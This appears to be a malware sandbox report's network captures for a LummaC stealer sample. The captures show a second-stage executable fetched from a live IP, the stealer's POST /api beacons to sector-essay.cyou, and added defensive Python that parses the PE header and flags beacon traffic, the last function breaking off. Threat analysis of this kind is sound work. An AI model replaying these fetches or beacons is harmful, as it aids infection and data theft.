Nov 24, 2024 08:35:47.056521893 CET | 49709 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:47.057693958 CET | 49709 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:47.057704926 CET | 443 | 49709 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:47.057938099 CET | 443 | 49709 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:47.060369968 CET | 49709 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:47.060503006 CET | 49709 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:47.060533047 CET | 443 | 49709 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:47.060600042 CET | 49709 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:47.060609102 CET | 443 | 49709 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:47.950278044 CET | 443 | 49709 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:47.950393915 CET | 443 | 49709 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:47.950455904 CET | 49709 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:47.950557947 CET | 49709 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:47.950577021 CET | 443 | 49709 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:48.063488960 CET | 49710 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:48.063530922 CET | 443 | 49710 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:48.063606024 CET | 49710 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:48.063896894 CET | 49710 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:48.063905954 CET | 443 | 49710 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:49.322613955 CET | 443 | 49710 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:49.322834015 CET | 49710 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:49.324028015 CET | 49710 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:49.324039936 CET | 443 | 49710 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:49.324276924 CET | 443 | 49710 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:49.325536013 CET | 49710 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:49.325622082 CET | 49710 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:49.325628042 CET | 443 | 49710 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:50.066952944 CET | 443 | 49710 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:50.067264080 CET | 443 | 49710 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:50.067446947 CET | 49710 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:50.084422112 CET | 49710 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:50.084445000 CET | 443 | 49710 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:50.695514917 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:50.695643902 CET | 443 | 49711 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:50.695741892 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:50.696089983 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:50.696125984 CET | 443 | 49711 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:51.956306934 CET | 443 | 49711 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:51.956377029 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:51.957668066 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:51.957686901 CET | 443 | 49711 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:51.958040953 CET | 443 | 49711 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:51.959358931 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:51.960248947 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:51.960294008 CET | 443 | 49711 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:51.960468054 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:51.960505962 CET | 443 | 49711 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:51.960606098 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:51.960656881 CET | 443 | 49711 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:51.960784912 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:51.960813999 CET | 443 | 49711 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:51.961018085 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:51.961042881 CET | 443 | 49711 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:51.961198092 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:51.961230040 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:51.961276054 CET | 443 | 49711 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:51.961457968 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:51.961487055 CET | 443 | 49711 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:51.961515903 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:51.961827040 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:51.961858034 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:52.007327080 CET | 443 | 49711 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:52.007540941 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:52.007596970 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:52.007647038 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:52.055330992 CET | 443 | 49711 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:52.055485964 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:52.099363089 CET | 443 | 49711 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:52.321885109 CET | 443 | 49711 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:54.302756071 CET | 443 | 49711 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:54.302999020 CET | 443 | 49711 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:54.303029060 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:54.303103924 CET | 49711 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:54.307183981 CET | 49722 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:54.307226896 CET | 443 | 49722 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:54.307344913 CET | 49722 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:54.307634115 CET | 49722 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:54.307651043 CET | 443 | 49722 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:55.573949099 CET | 443 | 49722 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:55.574110985 CET | 49722 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:55.575793028 CET | 49722 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:55.575812101 CET | 443 | 49722 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:55.576136112 CET | 443 | 49722 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:55.580684900 CET | 49722 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:55.580701113 CET | 49722 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:55.580761909 CET | 443 | 49722 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:56.299158096 CET | 443 | 49722 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:56.299418926 CET | 443 | 49722 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:56.299480915 CET | 49722 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:56.299633980 CET | 49722 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:56.299653053 CET | 443 | 49722 | 104.21.47.136 | 192.168.2.5
Nov 24, 2024 08:35:56.299678087 CET | 49722 | 443 | 192.168.2.5 | 104.21.47.136
Nov 24, 2024 08:35:56.299683094 CET | 443 | 49722 | 104.21.47.136 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 24, 2024 08:35:36.997805119 CET | 61746 | 53 | 192.168.2.5 | 1.1.1.1
Nov 24, 2024 08:35:37.328691006 CET | 53 | 61746 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 24, 2024 08:35:36.997805119 CET | 192.168.2.5 | 1.1.1.1 | 0x9fb4 | Standard query (0) | sector-essay.cyou | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 24, 2024 08:35:37.328691006 CET | 1.1.1.1 | 192.168.2.5 | 0x9fb4 | No error (0) | sector-essay.cyou | (none) | 104.21.47.136 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:35:37.328691006 CET | 1.1.1.1 | 192.168.2.5 | 0x9fb4 | No error (0) | sector-essay.cyou | (none) | 172.67.148.12 | A (IP address) | IN (0x0001) | false
                        • sector-essay.cyou
                        • 147.45.44.131
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 147.45.44.131 | 80 | 5452 | C:\Users\user\Desktop\ZjH6H6xqo7.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:35:34.052654982 CET | 181 | OUT | GET /infopage/tvh53.exe HTTP/1.1
X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
Host: 147.45.44.131
Connection: Keep-Alive
Nov 24, 2024 08:35:35.318037033 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 07:35:35 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Sat, 16 Nov 2024 15:59:10 GMT
ETag: "4ce00-62709c39a70e3"
Accept-Ranges: bytes
Content-Length: 314880
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 a2 bf 37 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 10 04 00 00 ba 00 00 00 00 00 00 70 8a 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cd 3b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 05 00 24 3d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 3d [TRUNCATED]
Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL7gp@@;`$==.textp `.rdata "@@.datalPX6@.CRTP@@.reloc$=`>@B
Nov 24, 2024 08:35:35.318114042 CET | 1236 | IN | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: D$t(8uxuxuD$D$jP1USWV |$81t$4.]Sut%E.]SuEu
Nov 24, 2024 08:35:35.318150997 CET | 1236 | IN | Data Raw: c4 04 85 c0 0f 84 61 02 00 00 b9 01 00 00 00 89 c3 c7 00 00 00 00 00 c7 40 04 06 00 00 00 89 48 08 e9 45 02 00 00 c7 45 08 00 00 00 00 55 e9 01 01 00 00 89 c7 8b 5c 24 14 50 e8 cd 70 00 00 83 c4 04 39 c3 0f 85 6a 02 00 00 8b 1e 0f b6 2b 55 e8 67
Data Ascii: a@HEEU\$Pp9j+UgqtC+UTqCuK<:5Ct$V@PWt$&.]SqtE.]SpEuM,E.]S
Nov 24, 2024 08:35:35.318185091 CET | 1236 | IN | Data Raw: cc cc cc cc cc cc cc cc 53 57 56 8b 7c 24 10 31 f6 85 ff 74 29 8b 5c 24 14 85 db 74 21 53 e8 15 6c 00 00 83 c4 04 50 53 57 e8 1a fe ff ff 83 c4 0c 85 c0 74 09 83 78 04 05 75 03 8b 70 08 89 f0 5e 5f 5b c3 cc cc cc cc 8b 4c 24 04 31 c0 85 c9 74 09
Data Ascii: SWV|$1t)\$t!SlPSWtxup^_[L$1tyuASWV|$t)\$t!SkPSWtxup^_[SWV\$|$j.Skt:Cj.Skt )PSW`1tx
Nov 24, 2024 08:35:35.318218946 CET | 1236 | IN | Data Raw: 24 0c 8b 44 24 08 8b 04 a8 83 f8 ff 0f 84 3b ff ff ff 8b 51 08 39 1c 82 75 da 8b 49 0c 8b 2c 81 55 e8 3e 67 00 00 8b 4c 24 28 83 c4 04 3b 04 24 75 c2 ff 34 24 55 ff 74 24 30 e8 45 67 00 00 8b 4c 24 30 83 c4 0c 85 c0 75 aa b8 ff ff ff ff e9 7a ff
Data Ascii: $D$;Q9uI,U>gL$(;$u4$Ut$0EgL$0uzD$QT$<GGN#l$D$Q9uID$PfL$(;$u4$t$t$0fL$0uUSWV0L$(Y
Nov 24, 2024 08:35:35.318252087 CET | 1236 | IN | Data Raw: 24 0f 0c e0 88 06 89 d1 c1 e9 06 89 c8 f7 d0 83 c8 3f 01 c8 fe c0 0c 80 88 46 01 80 e2 3f 80 ca 80 88 56 02 83 c6 02 b8 01 00 00 00 01 c7 83 c7 03 e9 36 ff ff ff 81 fa ff db 00 00 0f 87 e9 00 00 00 80 7d 06 5c 0f 85 df 00 00 00 80 7d 07 75 0f 85
Data Ascii: $?F?V6}\}uT$D$==)))?N?N$?F}+
Nov 24, 2024 08:35:35.318288088 CET | 1236 | IN | Data Raw: e8 87 5c 00 00 83 c4 04 c3 cc cc cc 8b 44 24 10 0f af 44 24 0c 50 ff 74 24 0c e8 7d 5c 00 00 83 c4 08 c3 cc cc cc cc cc cc cc cc cc 55 53 57 56 8b 4c 24 24 8b 44 24 1c 8b 74 24 14 85 f6 74 26 8b 5c 24 28 8b 54 24 20 8b 7c 24 18 89 7e 70 89 46 78
Data Ascii: \D$D$Pt$}\USWVL$$D$t$t&\$(T$ |$~pFxVtN|t(tte]1>0u~lunh|$(t)t%ttFl^_[]tu8ut
Nov 24, 2024 08:35:35.318320990 CET | 1236 | IN | Data Raw: 18 8b 74 24 10 0f 84 ed 00 00 00 39 5c 24 08 0f 84 b3 00 00 00 0f b6 0c 1a 8b 45 1c 01 de 8d 3c 06 81 e7 ff 7f 00 00 88 8c 3d 90 00 00 00 81 ff 00 01 00 00 77 07 88 8c 3d 90 80 00 00 8b 7c 24 10 01 df 47 89 7d 20 8b 7c 24 24 01 df 83 ff 03 72 a6
Data Ascii: t$9\$E<=w=|$G} |$$rL$ ,0MT$T*1|$T1zrfJrT$l$Tf}r<+l$9rD$Th$)\$\$U
Nov 24, 2024 08:35:35.318355083 CET | 1236 | IN | Data Raw: 4d 92 81 00 00 3d 80 00 00 00 0f 82 3a 01 00 00 8b 4d 28 8b 55 3c 89 d6 21 c6 31 c2 8d 14 72 89 55 3c 89 c2 80 c2 fd 88 11 8b 54 24 08 4a 8b 4d 28 88 51 01 89 d7 89 d1 c1 e9 08 8b 55 28 88 4a 02 83 45 28 03 8b 55 2c 0f b6 1a d0 eb 80 cb 80 88 1a
Data Ascii: M=:M(U<!1rU<T$JM(QU(JE(U,M82Ej+DEE8U(ru(U,=%j)DT$L$fE+DfEEPHEP|$}"M(U<!
Nov 24, 2024 08:35:35.318392038 CET | 1236 | IN | Data Raw: 7f 7f 66 83 f8 20 0f 87 3d 05 00 00 bb 00 78 00 00 ff 24 85 c4 31 44 00 bb 40 78 00 00 e9 33 05 00 00 85 c0 74 68 c7 46 44 08 00 00 00 b9 08 00 00 00 eb 1d 90 90 90 90 90 90 90 90 90 90 90 90 c1 ea 08 89 56 48 83 c1 f8 89 4e 44 83 f9 07 76 3f 8b
Data Ascii: f =x$1D@x3thFDVHNDv?F0;F4sHN0NDVH===x1F<FHND'FH)NDvV0;V4sJN0NDFH3V<V<
Nov 24, 2024 08:35:35.438220024 CET | 1236 | IN | Data Raw: 46 48 83 c2 f8 89 56 44 83 fa 07 0f 86 da fd ff ff 8b 4e 30 3b 4e 34 73 e3 8d 51 01 89 56 30 88 01 8b 56 44 8b 46 48 eb d3 8b 56 7c 8b 8e 8c 00 00 00 8b 2a 29 cd 89 df 39 eb 72 02 89 ef 03 4e 74 57 50 51 e8 13 49 00 00 83 c4 0c 01 be 8c 00 00 00
Data Ascii: FHVDN0;N4sQV0VDFHV|*)9rNtWPQI9v)~X^\F\^_[]=t=xxiB)NDx>FHFHNDr`^HND"^HND/F
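The session above is the stage-two fetch: the .NET sample sends a bare GET with no User-Agent and a non-standard X-Special-Header, and the Apache server answers with 314,880 bytes of application/x-msdos-program whose first bytes are the MZ header. The Python below is an added example, not code from the Joe Sandbox report or from the sample; it parses the header bytes printed in the first Data Raw cell (copied from the report and laid out by field, so a reader can check each offset) and reports what was actually downloaded: a PE32 image for i386 with five sections whose COFF timestamp, 0x6737bfa2, decodes to 2024-11-15 21:39:46 UTC, about eighteen hours before the server's Last-Modified of 16 Nov 2024 15:59:10 GMT. The same routine applied to any captured download body separates "an executable we should look at" from "not an executable" without running anything.

```python
"""Confirm that the body returned for GET /infopage/tvh53.exe is a PE image.

Added example. The bytes below are the start of the response body as printed
in the report's "Data Raw" cell: DOS header, DOS stub, PE signature, COFF
header and the first word of the optional header.
"""
import struct
from datetime import datetime, timezone

RESPONSE_BODY_PREFIX = bytes.fromhex(
    "4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "  # IMAGE_DOS_HEADER
    "40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 "                          # e_lfanew = 0x78
    "0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 "                                # DOS stub code
    "54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 "     # "This program cannot be "
    "72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 "                 # "run in DOS mode.$"
    "50 45 00 00 4c 01 05 00 a2 bf 37 67 00 00 00 00 00 00 00 00 e0 00 02 01 "  # "PE\0\0" + IMAGE_FILE_HEADER
    "0b 01 0e 00"                                                               # optional header: Magic, linker 14.0
)

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_32BIT_MACHINE = 0x0100
PE32_MAGIC = 0x010B


def parse_pe_prefix(data: bytes) -> dict:
    """Parse the DOS header, PE signature and COFF header at the start of an image.

    Raises ValueError when the bytes are not a PE image, so a caller can tell
    "not an executable" apart from "an executable worth a closer look".
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if len(data) < e_lfanew + 26:
        raise ValueError("buffer ends before the PE header")
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    (machine, nsections, timestamp, _symtab, _nsyms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]  # first word of the optional header
    return {
        "e_lfanew": e_lfanew,
        "machine": machine,
        "sections": nsections,
        "timestamp": timestamp,
        "compiled_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "optional_header_size": opt_size,
        "characteristics": characteristics,
        "magic": magic,
        "is_exe": bool(characteristics & IMAGE_FILE_EXECUTABLE_IMAGE),
        "is_32bit": magic == PE32_MAGIC and bool(characteristics & IMAGE_FILE_32BIT_MACHINE),
    }


def looks_like_pe(data: bytes) -> bool:
    """True when the buffer starts with a parseable PE header."""
    try:
        parse_pe_prefix(data)
    except ValueError:
        return False
    return True


PE_INFO = parse_pe_prefix(RESPONSE_BODY_PREFIX)

if __name__ == "__main__":
    for key, value in PE_INFO.items():
        print(f"{key:>22}: {value:#x}" if isinstance(value, int) and not isinstance(value, bool) else f"{key:>22}: {value}")
```

The timestamp check is the useful part for triage: a COFF timestamp that lands shortly before the server's Last-Modified, as here, is consistent with a freshly built payload being staged, whereas one in the future or at epoch zero is a sign the field was rewritten.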


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 104.21.47.136 | 443 | 6392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 07:35:38 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: sector-essay.cyou
2024-11-24 07:35:38 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-11-24 07:35:39 UTC | 1014 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 07:35:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=s9883k7topelmfp6eurmt20631; expires=Thu, 20-Mar-2025 01:22:18 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D7axALczaFQyHOhiVpeop0GII0L%2BPmERo772FuW9iIIl8BWem3bPIW0gXknobtOmAsQC0hXy1rs%2BCeRymbWbnCnoBbVtWcyStMerADoi0cK%2Bcv1oNVkewGK76n5ziNGgZCbWJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e77b9340ab542c7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1576&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4228&recv_bytes=908&delivery_rate=291650&cwnd=252&unsent_bytes=0&cid=6f7e642359f1798e&ts=718&x=0"
2024-11-24 07:35:39 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-11-24 07:35:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
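The RegAsm.exe sessions to sector-essay.cyou are the LummaC beacon in the clear once TLS is off: a POST /api form body whose act field is first life, answered with the chunked body 2\r\nok\r\n 0\r\n\r\n (that is, the two-byte string ok), and then recive_message with a version and a campaign id, answered with a single chunk of 0x258a bytes of base64-looking text that the report leaves encoded. The Python below is an added example, not code from the Joe Sandbox report or from the sample. It reassembles chunked reply bodies from the raw bytes the report prints and scores a captured request against the traits visible in these two sessions. The two requests, the first reply and the first bytes of the second reply are copied from the report; the benign request is constructed for contrast, the set of act values is limited to the two observed on this page, and the "browser User-Agent sent by a non-browser process" check is a heuristic of mine (RegAsm.exe is the sender here), not something the report asserts.

```python
"""Pick the LummaC /api beacon out of captured HTTP and decode its chunked replies.

Added example. Requests and reply bytes are as printed in the report; the
recive_message reply is only its first bytes, enough to read the declared
chunk size but not to reassemble the body.
"""
from urllib.parse import parse_qs

UA = (b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      b"(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n")
REQ_LIFE = (b"POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n" + UA +
            b"Content-Length: 8\r\nHost: sector-essay.cyou\r\n\r\n"
            b"act=life")
REQ_RECV = (b"POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n" + UA +
            b"Content-Length: 52\r\nHost: sector-essay.cyou\r\n\r\n"
            b"act=recive_message&ver=4.0&lid=yau6Na--6928154717&j=")
# Constructed benign request for contrast (not from the report).
REQ_BENIGN = b"GET /index.html HTTP/1.1\r\nHost: example.invalid\r\nUser-Agent: curl/8.0\r\n\r\n"

# Reply to act=life as captured: chunk "2\r\nok\r\n" then the terminating "0\r\n\r\n".
LIFE_REPLY = bytes.fromhex("32 0d 0a 6f 6b 0d 0a") + bytes.fromhex("30 0d 0a 0d 0a")
# First bytes of the recive_message reply: size line "258a" then base64-looking text.
RECV_REPLY_PREFIX = bytes.fromhex("32 35 38 61 0d 0a 47 43 64 2f 78 35 6a 4d 66 43 35 33")

SENDER = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"  # PID 6392 in the report
LUMMA_ACTIONS = {"life", "recive_message"}  # only the act values observed on this page


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, headers, body); header names lowercased."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("request has no header terminator")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def decode_chunked(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body; raises ValueError on a truncated capture."""
    out, pos = bytearray(), 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("truncated chunk-size line")
        size = int(body[pos:eol].split(b";", 1)[0], 16)  # drop any chunk extension
        pos = eol + 2
        if size == 0:
            return bytes(out)  # last chunk; trailers, if any, are not needed here
        chunk = body[pos:pos + size]
        if len(chunk) != size:
            raise ValueError(f"truncated chunk: declared {size}, captured {len(chunk)}")
        out += chunk
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("missing CRLF after chunk data")
        pos += 2


def chunked_is_complete(body: bytes) -> bool:
    try:
        decode_chunked(body)
    except ValueError:
        return False
    return True


def first_chunk_size(body: bytes) -> int:
    """Declared size of the first chunk, readable even when the capture is cut short."""
    eol = body.find(b"\r\n")
    if eol < 0:
        raise ValueError("no chunk-size line")
    return int(body[:eol].split(b";", 1)[0], 16)


def lumma_c2_indicators(raw_request: bytes, process: str = "") -> list:
    """Return the traits of the captured LummaC beacon that this request shares."""
    method, path, headers, body = parse_http_request(raw_request)
    hits = []
    if method == "POST" and path == "/api":
        hits.append("POST /api")
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        fields = parse_qs(body.decode("latin-1"), keep_blank_values=True)
        act = fields.get("act", [""])[0]
        if act in LUMMA_ACTIONS:
            hits.append(f"act={act}")
        if fields.get("lid", [""])[0]:
            hits.append("lid=<campaign id>")
        if fields.get("ver", [""])[0]:
            hits.append(f"ver={fields['ver'][0]}")
    # Heuristic (my assumption, not the report's): a Chrome UA from a non-browser process.
    if "Chrome/" in headers.get("user-agent", "") and process and "chrome" not in process.lower():
        hits.append(f"browser UA from {process.rsplit(chr(92), 1)[-1]}")
    return hits


def is_lumma_beacon(raw_request: bytes, process: str = "") -> bool:
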